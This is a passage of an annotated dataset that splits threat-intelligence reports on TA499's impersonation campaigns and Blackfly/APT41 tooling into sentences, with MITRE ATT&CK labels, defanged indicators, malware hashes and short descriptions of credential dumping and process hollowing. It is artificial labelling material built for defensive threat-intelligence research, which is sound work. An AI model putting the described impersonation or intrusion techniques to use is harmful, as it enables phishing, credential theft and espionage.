"aptnotes-16_aptnotes_report-p1-s7-2ad31b", "source": "aptnotes", "doc_id": "16_aptnotes_report", "page_number": 1, "sentence_id": 7, "context_before": "Since that time, the threat actor has engaged in steady activity and expanded its targeting to include prominent businesspeople and high- profile individuals that have either made large donations to Ukrainian humanitarian efforts or those making public statements about Russian disinformation and propaganda.", "sentence_text": "Proofpoint tracks TA499 as an impersonation-based, patriotically motivated misinformation pair of actors aligned with the Russian state.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-16_aptnotes_report-p1-s8-3e9eb5", "source": "aptnotes", "doc_id": "16_aptnotes_report", "page_number": 1, "sentence_id": 8, "context_before": "Proofpoint tracks TA499 as an impersonation-based, patriotically motivated misinformation pair of actors aligned with the Russian state.", "sentence_text": "The group has a record of targeting high-profile persons of interest that have spoken out about the Russian regime, in favor of sanctions 1/10", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-16_aptnotes_report-p2-s9-a530b0", "source": "aptnotes", "doc_id": "16_aptnotes_report", "page_number": 2, "sentence_id": 9, "context_before": "The group has a record of targeting high-profile persons of interest that have spoken out about the Russian regime, in favor of sanctions 1/10", "sentence_text": "against Russia, and against the detainment of well-known Russian opposition leader Alexei Navalny.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-16_aptnotes_report-p2-s10-fadfbd", "source": "aptnotes", "doc_id": "16_aptnotes_report", "page_number": 2, "sentence_id": 10, "context_before": "against Russia, and against the detainment of well-known Russian opposition leader Alexei Navalny.", "sentence_text": "While the level of official government support TA499 receives is unknown, the recordings are generally used to garner support and sympathy for the current Russian regime and their actions.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-16_aptnotes_report-p2-s11-2cd80e", "source": "aptnotes", "doc_id": "16_aptnotes_report", "page_number": 2, "sentence_id": 11, "context_before": "While the level of official government support TA499 receives is unknown, the recordings are generally used to garner support and sympathy for the current Russian regime and their actions.", "sentence_text": "Critiques of Putin, Russia Spur TA499 Action in 2022 TA499’s email campaigns kicked into high gear as tensions built between Russia and Ukraine and has not abated since Russia invaded Ukraine in February 2022.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-16_aptnotes_report-p2-s12-19a6ee", "source": "aptnotes", "doc_id": "16_aptnotes_report", "page_number": 2, "sentence_id": 12, "context_before": "Critiques of Putin, Russia Spur TA499 Action in 2022 TA499’s email campaigns kicked into high gear as tensions built between Russia and Ukraine and has not abated since Russia invaded Ukraine in February 2022.", "sentence_text": "Since late-January 2022, the threat actor has largely focused its email attempts on scheduling a video or phone call meeting with high-profile North American or European government officials and CEOs of prominent companies.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Send emails to targets to arrange video or phone call meetings.", "entities": [ { "text": "the threat actor", "start": 25, "end": 41, "label": "ThreatActor" }, { "text": "focused its email attempts on scheduling a video or phone call meeting", "start": 54, "end": 124, "label": "Action" } ] }, { "uid": "aptnotes-16_aptnotes_report-p2-s13-3c22a9", "source": "aptnotes", "doc_id": "16_aptnotes_report", "page_number": 2, "sentence_id": 13, "context_before": "Since late-January 2022, the threat actor has largely focused its email attempts on scheduling a video or phone call meeting with high-profile North American or European government officials and CEOs of prominent companies.", "sentence_text": "In a shift from their 2021 activity, these campaigns have almost exclusively centered on topics relating to the Russia-Ukraine war.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-16_aptnotes_report-p2-s14-7c82ab", "source": "aptnotes", "doc_id": "16_aptnotes_report", "page_number": 2, "sentence_id": 14, "context_before": "In a shift from their 2021 activity, these campaigns have almost exclusively centered on topics relating to the Russia-Ukraine war.", "sentence_text": "Only in the latter half of 2022 did TA499 begin to reincorporate some of its pre-war themes and email addresses, but those continue to be a fraction of their overall activity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-16_aptnotes_report-p2-s15-e49d7e", "source": "aptnotes", "doc_id": "16_aptnotes_report", "page_number": 2, "sentence_id": 15, "context_before": "Only in the latter half of 2022 did TA499 begin to reincorporate some of its pre-war themes and email addresses, but those continue to be a fraction of their overall activity.", "sentence_text": "Early 2022: TA499’s initial 2022 campaigns used the same actor-controlled domain (oleksandrmerezhko[.]com) and sender address (office@oleksandrmerezhko[.]com) as its 2021 campaigns, and directly targeted individuals that had spoken out regarding:\nBill to Arm Ukraine against Russia 2/10", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-16_aptnotes_report-p3-s16-f6dcaf", "source": "aptnotes", "doc_id": "16_aptnotes_report", "page_number": 3, "sentence_id": 16, "context_before": "Early 2022: TA499’s initial 2022 campaigns used the same actor-controlled domain (oleksandrmerezhko[.]com) and sender address (office@oleksandrmerezhko[.]com) as its 2021 campaigns, and directly targeted individuals that had spoken out regarding:\nBill to Arm Ukraine against Russia 2/10", "sentence_text": "Most notably, the threat actor began to masquerade as the Ukrainian Prime Minister Denys Shmyhal and his purported assistant.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Masquerade as Ukrainian Prime Minister and assistant to deceive targets.", "entities": [ { "text": "the threat actor", "start": 14, "end": 30, "label": "ThreatActor" }, { "text": "began to masquerade as the Ukrainian Prime Minister Denys Shmyhal and his purported assistant", "start": 31, "end": 124, "label": "Action" } ] }, { "uid": "aptnotes-16_aptnotes_report-p3-s17-70262d", "source": "aptnotes", "doc_id": "16_aptnotes_report", "page_number": 3, "sentence_id": 17, "context_before": "Most notably, the threat actor began to masquerade as the Ukrainian Prime Minister Denys Shmyhal and his purported assistant.", "sentence_text": "To make the emails convincing in their legitimacy, the sender addresses leveraged the popular internet service and email provider Ukr.net and pretended to be from either “the Embassy of Ukraine to the US” or “the Embassy of Ukraine in the US:” embassy.usa@ukr[.]net and embassy.us@ukr[.]net.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Use Ukr.net email accounts to impersonate Ukrainian embassy entities and send convincing emails.", "entities": [ { "text": "leveraged the popular internet service and email provider Ukr.net and pretended to be from either “the Embassy of Ukraine to the US” or “the Embassy of Ukraine in the US:”", "start": 72, "end": 243, "label": "Action" }, { "text": "Ukr.net", "start": 130, "end": 137, "label": "Infrastructure_Indicator" }, { "text": "embassy.usa@ukr[.]net", "start": 244, "end": 265, "label": "Infrastructure_Indicator" }, { "text": "embassy.us@ukr[.]net", "start": 270, "end": 290, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-16_aptnotes_report-p3-s18-77fb90", "source": "aptnotes", "doc_id": "16_aptnotes_report", "page_number": 3, "sentence_id": 18, "context_before": "To make the emails convincing in their legitimacy, the sender addresses leveraged the popular internet service and email provider Ukr.net and pretended to be from either “the Embassy of Ukraine to the US” or “the Embassy of Ukraine in the US:” embassy.usa@ukr[.]net and embassy.us@ukr[.]net.", "sentence_text": "The subjects focused on Ukrainian officials making requests of the targets, such as:\nUkrainian Parliament –", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-16_aptnotes_report-p3-s20-807aef", "source": "aptnotes", "doc_id": "16_aptnotes_report", "page_number": 3, "sentence_id": 20, "context_before": "[Target Name].", "sentence_text": "Request Prime Minister of Ukraine.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-16_aptnotes_report-p3-s21-8f87a0", "source": "aptnotes", "doc_id": "16_aptnotes_report", "page_number": 3, "sentence_id": 21, "context_before": "Request Prime Minister of Ukraine.", "sentence_text": "Request Ukrainian Parliament –", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-16_aptnotes_report-p3-s22-2ed41c", "source": "aptnotes", "doc_id": "16_aptnotes_report", "page_number": 3, "sentence_id": 22, "context_before": "Request Ukrainian Parliament –", "sentence_text": "[Target Name]\nEmbassy of Ukraine - CEO [Target Name].", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-16_aptnotes_report-p3-s23-8ededa", "source": "aptnotes", "doc_id": "16_aptnotes_report", "page_number": 3, "sentence_id": 23, "context_before": "[Target Name]\nEmbassy of Ukraine - CEO [Target Name].", "sentence_text": "Request As seen in Figure 2, Proofpoint researchers identified and tracked this new activity through TA499’s preference for including their new sender addresses in the TO: or CC: lines of email campaigns leveraging older addresses.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-16_aptnotes_report-p3-s24-ce9d45", "source": "aptnotes", "doc_id": "16_aptnotes_report", "page_number": 3, "sentence_id": 24, "context_before": "Request As seen in Figure 2, Proofpoint researchers identified and tracked this new activity through TA499’s preference for including their new sender addresses in the TO: or CC: lines of email campaigns leveraging older addresses.", "sentence_text": "It is important to note that the threat actor cycles through its addresses.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-16_aptnotes_report-p3-s25-1566b1", "source": "aptnotes", "doc_id": "16_aptnotes_report", "page_number": 3, "sentence_id": 25, "context_before": "It is important to note that the threat actor cycles through its addresses.", "sentence_text": "While one may appear to have gone dormant, it could return in future TA499 campaigns.\n3/10", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-16_aptnotes_report-p4-s26-53219d", "source": "aptnotes", "doc_id": "16_aptnotes_report", "page_number": 4, "sentence_id": 26, "context_before": "While one may appear to have gone dormant, it could return in future TA499 campaigns.\n3/10", "sentence_text": "the first four in 2021 and the last two in its 2022 campaigns; however, TA499 started to leverage its Navalny and Merezhko email addresses again in late 2022.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-16_aptnotes_report-p4-s27-a1851a", "source": "aptnotes", "doc_id": "16_aptnotes_report", "page_number": 4, "sentence_id": 27, "context_before": "the first four in 2021 and the last two in its 2022 campaigns; however, TA499 started to leverage its Navalny and Merezhko email addresses again in late 2022.", "sentence_text": "The timing of this activity aligned with a public statement by the IAEA Director General about the urgent situation at Ukraine’s Zaporizhzhia nuclear power plant.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-16_aptnotes_report-p4-s28-8b79c3", "source": "aptnotes", "doc_id": "16_aptnotes_report", "page_number": 4, "sentence_id": 28, "context_before": "The timing of this activity aligned with a public statement by the IAEA Director General about the urgent situation at Ukraine’s Zaporizhzhia nuclear power plant.", "sentence_text": "It is likely that the international attention surrounding the state of the power plant inspired TA499’s decision to use an IAEA lure.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-16_aptnotes_report-p4-s29-4c85db", "source": "aptnotes", "doc_id": "16_aptnotes_report", "page_number": 4, "sentence_id": 29, "context_before": "It is likely that the international attention surrounding the state of the power plant inspired TA499’s decision to use an IAEA lure.", "sentence_text": "A Return to Early TA499 Themes 4/10", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-16_aptnotes_report-p5-s30-ad3203", "source": "aptnotes", "doc_id": "16_aptnotes_report", "page_number": 5, "sentence_id": 30, "context_before": "A Return to Early TA499 Themes 4/10", "sentence_text": "office@oleksandrmerezhko[.]com.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-16_aptnotes_report-p5-s31-a426ce", "source": "aptnotes", "doc_id": "16_aptnotes_report", "page_number": 5, "sentence_id": 31, "context_before": "office@oleksandrmerezhko[.]com.", "sentence_text": "This address was dormant between March 2022 and September 2022.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-16_aptnotes_report-p5-s32-39b560", "source": "aptnotes", "doc_id": "16_aptnotes_report", "page_number": 5, "sentence_id": 32, "context_before": "This address was dormant between March 2022 and September 2022.", "sentence_text": "Navalny has long been a focus for TA499 campaigns with the threat actor targeting individuals with an interest in and publicly positive stances on the oppositionist since early 2021.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-16_aptnotes_report-p5-s33-1a32ea", "source": "aptnotes", "doc_id": "16_aptnotes_report", "page_number": 5, "sentence_id": 33, "context_before": "Navalny has long been a focus for TA499 campaigns with the threat actor targeting individuals with an interest in and publicly positive stances on the oppositionist since early 2021.", "sentence_text": "As seen in the sample email in Figure 4, TA499 has repeatedly used social engineering with a focus on directing conversation to easily recorded meetings and subject lines such as:\n“Request.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-16_aptnotes_report-p5-s34-5d729d", "source": "aptnotes", "doc_id": "16_aptnotes_report", "page_number": 5, "sentence_id": 34, "context_before": "As seen in the sample email in Figure 4, TA499 has repeatedly used social engineering with a focus on directing conversation to easily recorded meetings and subject lines such as:\n“Request.", "sentence_text": "Vice-President of the Parliamentary Assembly of the Council of Europe (PACE)” 5/10", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-16_aptnotes_report-p6-s35-8b258c", "source": "aptnotes", "doc_id": "16_aptnotes_report", "page_number": 6, "sentence_id": 35, "context_before": "Vice-President of the Parliamentary Assembly of the Council of Europe (PACE)” 5/10", "sentence_text": "“[redacted] - Russian opposition leader Alexei Navalny's team” “Russian opposition leader Alexei Navalny's team – [redacted]” “Alexei Navalny's Chief of Staff - [redacted].", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-16_aptnotes_report-p6-s36-a8b7b8", "source": "aptnotes", "doc_id": "16_aptnotes_report", "page_number": 6, "sentence_id": 36, "context_before": "“[redacted] - Russian opposition leader Alexei Navalny's team” “Russian opposition leader Alexei Navalny's team – [redacted]” “Alexei Navalny's Chief of Staff - [redacted].", "sentence_text": "Request” “Re: Meeting with Mr Volkov” The World is Watching…On YouTube (or RUTUBE)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-16_aptnotes_report-p6-s37-47ac46", "source": "aptnotes", "doc_id": "16_aptnotes_report", "page_number": 6, "sentence_id": 37, "context_before": "Request” “Re: Meeting with Mr Volkov” The World is Watching…On YouTube (or RUTUBE)", "sentence_text": "TA499 posts recordings of its video calls on YouTube and RUTUBE.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-16_aptnotes_report-p6-s38-da5125", "source": "aptnotes", "doc_id": "16_aptnotes_report", "page_number": 6, "sentence_id": 38, "context_before": "TA499 posts recordings of its video calls on YouTube and RUTUBE.", "sentence_text": "One of the threat actor’s YouTube channels was taken down early in the Russia-Ukraine war, forcing TA499 to revert to using one of its older YouTube channels for posting.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-16_aptnotes_report-p6-s39-0c98b1", "source": "aptnotes", "doc_id": "16_aptnotes_report", "page_number": 6, "sentence_id": 39, "context_before": "One of the threat actor’s YouTube channels was taken down early in the Russia-Ukraine war, forcing TA499 to revert to using one of its older YouTube channels for posting.", "sentence_text": "Video calls recorded in 2021 show TA499 impersonating Leonid Volkov as well.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-16_aptnotes_report-p6-s40-d11a98", "source": "aptnotes", "doc_id": "16_aptnotes_report", "page_number": 6, "sentence_id": 40, "context_before": "Video calls recorded in 2021 show TA499 impersonating Leonid Volkov as well.", "sentence_text": "The actor does not appear to be using any voice modulation, primarily focusing on the targets’ lack of familiarity with the contact and the element of surprise.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-16_aptnotes_report-p7-s42-8f1349", "source": "aptnotes", "doc_id": "16_aptnotes_report", "page_number": 7, "sentence_id": 42, "context_before": "6/10", "sentence_text": "Conversations with TA499 typically begin serious and allow the target to voluntarily say as much information as possible.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-16_aptnotes_report-p7-s43-fe02c2", "source": "aptnotes", "doc_id": "16_aptnotes_report", "page_number": 7, "sentence_id": 43, "context_before": "Conversations with TA499 typically begin serious and allow the target to voluntarily say as much information as possible.", "sentence_text": "Once the target begins asking questions, the actor mirrors the target’s replies to keep the conversation going.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-16_aptnotes_report-p7-s44-df3a15", "source": "aptnotes", "doc_id": "16_aptnotes_report", "page_number": 7, "sentence_id": 44, "context_before": "Once the target begins asking questions, the actor mirrors the target’s replies to keep the conversation going.", "sentence_text": "Some of the 2021 videos with the threat actor have the Leonid Volkov impersonator asking for financial support and appear to encourage the target into voicing particular obligations and efforts in tandem with the Russian opposition led by Navalny.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-16_aptnotes_report-p7-s45-272d4b", "source": "aptnotes", "doc_id": "16_aptnotes_report", "page_number": 7, "sentence_id": 45, "context_before": "Some of the 2021 videos with the threat actor have the Leonid Volkov impersonator asking for financial support and appear to encourage the target into voicing particular obligations and efforts in tandem with the Russian opposition led by Navalny.", "sentence_text": "The recordings are then edited for emphasis and placed on YouTube and Twitter for Russian and English-speaking audiences.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-16_aptnotes_report-p8-s47-e8ea63", "source": "aptnotes", "doc_id": "16_aptnotes_report", "page_number": 8, "sentence_id": 47, "context_before": "7/10", "sentence_text": "the threat actor’s YouTube channel, which has since been taken down.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-16_aptnotes_report-p8-s48-75803c", "source": "aptnotes", "doc_id": "16_aptnotes_report", "page_number": 8, "sentence_id": 48, "context_before": "the threat actor’s YouTube channel, which has since been taken down.", "sentence_text": "Conclusion\nTA499 is a very public group that is garnering a fan following.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-16_aptnotes_report-p8-s49-8eee57", "source": "aptnotes", "doc_id": "16_aptnotes_report", "page_number": 8, "sentence_id": 49, "context_before": "Conclusion\nTA499 is a very public group that is garnering a fan following.", "sentence_text": "They have personas that not only post the material discussed in this report online but also perform reenactments on Russia state-sponsored media as well as attend conferences.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-16_aptnotes_report-p8-s50-d850b9", "source": "aptnotes", "doc_id": "16_aptnotes_report", "page_number": 8, "sentence_id": 50, "context_before": "They have personas that not only post the material discussed in this report online but also perform reenactments on Russia state-sponsored media as well as attend conferences.", "sentence_text": "With the war between Russia and Ukraine unlikely to end in the near-term and Ukraine continuing to garner support from organizations worldwide, Proofpoint assesses with high confidence that TA499 will attempt to continue with its campaigns in support of its influencer content and political agenda.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-16_aptnotes_report-p8-s51-1b961a", "source": "aptnotes", "doc_id": "16_aptnotes_report", "page_number": 8, "sentence_id": 51, "context_before": "With the war between Russia and Ukraine unlikely to end in the near-term and Ukraine continuing to garner support from organizations worldwide, Proofpoint assesses with high confidence that TA499 will attempt to continue with its campaigns in support of its influencer content and political agenda.", "sentence_text": "TA499 is likely to reuse old or establish additional infrastructure in support of this activity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-16_aptnotes_report-p8-s52-263363", "source": "aptnotes", "doc_id": "16_aptnotes_report", "page_number": 8, "sentence_id": 52, "context_before": "TA499 is likely to reuse old or establish additional infrastructure in support of this activity.", "sentence_text": "Being a target of this group is gradually becoming more common.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-16_aptnotes_report-p8-s53-32ae3e", "source": "aptnotes", "doc_id": "16_aptnotes_report", "page_number": 8, "sentence_id": 53, "context_before": "Being a target of this group is gradually becoming more common.", "sentence_text": "While the primary targeting of TA499 remains the C-level or the highest profile positions possible at any given entity, Proofpoint recommends that anyone who suspects they might be a target of TA499’s take care in verifying the identities of those inviting them to conduct business or discuss 8/10", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-16_aptnotes_report-p9-s54-696b80", "source": "aptnotes", "doc_id": "16_aptnotes_report", "page_number": 9, "sentence_id": 54, "context_before": "While the primary targeting of TA499 remains the C-level or the highest profile positions possible at any given entity, Proofpoint recommends that anyone who suspects they might be a target of TA499’s take care in verifying the identities of those inviting them to conduct business or discuss 8/10", "sentence_text": "political topics over video conferencing.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-16_aptnotes_report-p9-s55-247927", "source": "aptnotes", "doc_id": "16_aptnotes_report", "page_number": 9, "sentence_id": 55, "context_before": "political topics over video conferencing.", "sentence_text": "Check out the latest podcast episode on DISCARDED, Prank or Propaganda?", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-16_aptnotes_report-p9-s56-a17117", "source": "aptnotes", "doc_id": "16_aptnotes_report", "page_number": 9, "sentence_id": 56, "context_before": "Check out the latest podcast episode on DISCARDED, Prank or Propaganda?", "sentence_text": "TA499 Pesters Politics.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-16_aptnotes_report-p9-s57-6fd234", "source": "aptnotes", "doc_id": "16_aptnotes_report", "page_number": 9, "sentence_id": 57, "context_before": "TA499 Pesters Politics.", "sentence_text": "Indicators of Compromise (IOCs)\nIndicator Type Description office@oleksandrmerezhko[.]com Sender address 2022 campaigns secretary.mfa@gmail[.]com Sender address 2022 campaigns embassy.usa@ukr[.]net Sender address 2022 campaigns embassy.us@ukr[.]net Sender address 2022 campaigns s.dorenko@ukr[.]net Sender address 2022 campaigns embassy.chernysh@ukr[.]net Sender address 2022 campaigns office@iaea[.]co[.]uk Sender address 2022 campaign iaea[.]com[.]uk Domain 2022 campaign oleksandrmerezhko[.]com Domain 2021 & 2022 campaigns navalny[.]team", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-16_aptnotes_report-p9-s58-d9cd2b", "source": "aptnotes", "doc_id": "16_aptnotes_report", "page_number": 9, "sentence_id": 58, "context_before": "Indicators of Compromise (IOCs)\nIndicator Type Description office@oleksandrmerezhko[.]com Sender address 2022 campaigns secretary.mfa@gmail[.]com Sender address 2022 campaigns embassy.usa@ukr[.]net Sender address 2022 campaigns embassy.us@ukr[.]net Sender address 2022 campaigns s.dorenko@ukr[.]net Sender address 2022 campaigns embassy.chernysh@ukr[.]net Sender address 2022 campaigns office@iaea[.]co[.]uk Sender address 2022 campaign iaea[.]com[.]uk Domain 2022 campaign oleksandrmerezhko[.]com Domain 2021 & 2022 campaigns navalny[.]team", "sentence_text": "Domain 2021 campaigns office@oleksandrmerezhko[.]com Sender address 2021 & 2022 campaigns lvolkov@navalny[.]team Sender address 2021 campaigns julia@navalny[.]team Sender address 2021 campaigns 9/10", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-17_aptnotes_report-p1-s1-2392c9", "source": "aptnotes", "doc_id": "17_aptnotes_report", "page_number": 1, "sentence_id": 1, "context_before": "", "sentence_text": "Blackfly: Espionage Group Targets Materials Technology symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackfly-espionage-materials The Blackfly espionage group (aka APT41, Winnti Group, Bronze Atlas) has continued to mount attacks against targets in Asia and recently targeted two subsidiaries of an Asian conglomerate, both of which operate in the materials and composites sector, suggesting that the group may be attempting to steal intellectual property.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1005", "name": "Data from Local System" } ], "procedure": "Espionage group targeted subsidiaries in the materials and composites sector to steal intellectual property", "entities": [ { "text": "Blackfly", "start": 0, "end": 8, "label": "ThreatActor" }, { "text": "aka APT41, Winnti Group, Bronze Atlas", "start": 179, "end": 216, "label": "ThreatActor" }, { "text": "two subsidiaries of an Asian conglomerate", "start": 295, "end": 336, "label": "Infrastructure_Indicator" }, { "text": " Targets", "start": 25, "end": 33, "label": "Action" }, { "text": "to steal intellectual property", "start": 444, "end": 474, "label": "Action" } ] }, { "uid": "aptnotes-17_aptnotes_report-p1-s2-3ad7c5", "source": "aptnotes", "doc_id": "17_aptnotes_report", "page_number": 1, "sentence_id": 2, "context_before": "Blackfly: Espionage Group Targets Materials Technology symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackfly-espionage-materials The Blackfly espionage group (aka APT41, Winnti Group, Bronze Atlas) has continued to mount attacks against targets in Asia and recently targeted two subsidiaries of an Asian conglomerate, both of which operate in the materials and composites sector, suggesting that the group may be attempting to steal intellectual property.", "sentence_text": "Current Blackfly toolset The following tools were used in attacks during late 2022 and early 2023:\nBackdoor.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-17_aptnotes_report-p1-s3-3e9c92", "source": "aptnotes", "doc_id": "17_aptnotes_report", "page_number": 1, "sentence_id": 3, "context_before": "Current Blackfly toolset The following tools were used in attacks during late 2022 and early 2023:\nBackdoor.", "sentence_text": "Winnkit\nSHA256: caba1085791d13172b1bb5aca25616010349ecce17564a00cb1d89c7158d6459\nSHA256: cf6bcd3a62720f0e26e1880fe7ac9ca6c62f7f05f1f68b8fe59a4eb47377880a\nSHA256: e1e0b887b68307ed192d393e886d8b982e4a2fd232ee13c2f20cd05f91358596\nSHA256: a3078d0c4c564f5efb1460e7d341981282f637d38048501221125756bc740aac\nSHA256: 714cef77c92b1d909972580ec7602b0914f30e32c09a5e8cb9cb4d32aa2a2196\nSHA256: 192ef0dee8df73eec9ee617abe4b0104799f9543a22a41e28d4d44c3ad713284\nRootkit driver known to be associated with Blackfly Credential-dumping tool SHA256: 100cad54c1f54126b9d37eb8c9e426cb609fc0eda0e9a241c2c9fd5a3a01ad6c Creates a dump of credentials from lsass.exe in C:\\windows\\temp\\1.bin.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-17_aptnotes_report-p1-s4-1f8faf", "source": "aptnotes", "doc_id": "17_aptnotes_report", "page_number": 1, "sentence_id": 4, "context_before": "Winnkit\nSHA256: caba1085791d13172b1bb5aca25616010349ecce17564a00cb1d89c7158d6459\nSHA256: cf6bcd3a62720f0e26e1880fe7ac9ca6c62f7f05f1f68b8fe59a4eb47377880a\nSHA256: e1e0b887b68307ed192d393e886d8b982e4a2fd232ee13c2f20cd05f91358596\nSHA256: a3078d0c4c564f5efb1460e7d341981282f637d38048501221125756bc740aac\nSHA256: 714cef77c92b1d909972580ec7602b0914f30e32c09a5e8cb9cb4d32aa2a2196\nSHA256: 192ef0dee8df73eec9ee617abe4b0104799f9543a22a41e28d4d44c3ad713284\nRootkit driver known to be associated with Blackfly Credential-dumping tool SHA256: 100cad54c1f54126b9d37eb8c9e426cb609fc0eda0e9a241c2c9fd5a3a01ad6c Creates a dump of credentials from lsass.exe in C:\\windows\\temp\\1.bin.", "sentence_text": "Screenshotting tool\nSHA256: 452d08d420a8d564ff5df6f6a91521887f8b9141d96c77a423ac7fc9c28e07e4\nScreenshots all open windows and saves them as .jpg files.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-17_aptnotes_report-p1-s5-9ba76f", "source": "aptnotes", "doc_id": "17_aptnotes_report", "page_number": 1, "sentence_id": 5, "context_before": "Screenshotting tool\nSHA256: 452d08d420a8d564ff5df6f6a91521887f8b9141d96c77a423ac7fc9c28e07e4\nScreenshots all open windows and saves them as .jpg files.", "sentence_text": "Process-hollowing tool\nSHA256: 1cc838896fbaf7c1996198309fbf273c058b796cd2ac1ba7a46bee6df606900e\nInjects shellcode in C:\\Windows\\system32\\svchost.exe -k LocalSystemNetworkRestricted.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1055.012", "name": "Process Hollowing" } ], "procedure": "Tool injects shellcode into svchost.exe using process hollowing", "entities": [ { "text": "Process-hollowing tool", "start": 0, "end": 22, "label": "MalwareTool" }, { "text": "C:\\Windows\\system32\\svchost.exe", "start": 117, "end": 148, "label": "Infrastructure_Indicator" }, { "text": "Injects shellcode", "start": 96, "end": 113, "label": "Action" } ] }, { "uid": "aptnotes-17_aptnotes_report-p1-s6-111865", "source": "aptnotes", "doc_id": "17_aptnotes_report", "page_number": 1, "sentence_id": 6, "context_before": "Process-hollowing tool\nSHA256: 1cc838896fbaf7c1996198309fbf273c058b796cd2ac1ba7a46bee6df606900e\nInjects shellcode in C:\\Windows\\system32\\svchost.exe -k LocalSystemNetworkRestricted.", "sentence_text": "The shellcode is a simple \"Hello World\" alert message.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-17_aptnotes_report-p1-s7-7f1405", "source": "aptnotes", "doc_id": "17_aptnotes_report", "page_number": 1, "sentence_id": 7, "context_before": "The shellcode is a simple \"Hello World\" alert message.", "sentence_text": "SQL tool\nSHA256: 4ae2cb9454077300151e701e6ac4e4d26dc72227135651e02437902ac05aa80d\nSQL client tool used to query SQL databases.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": 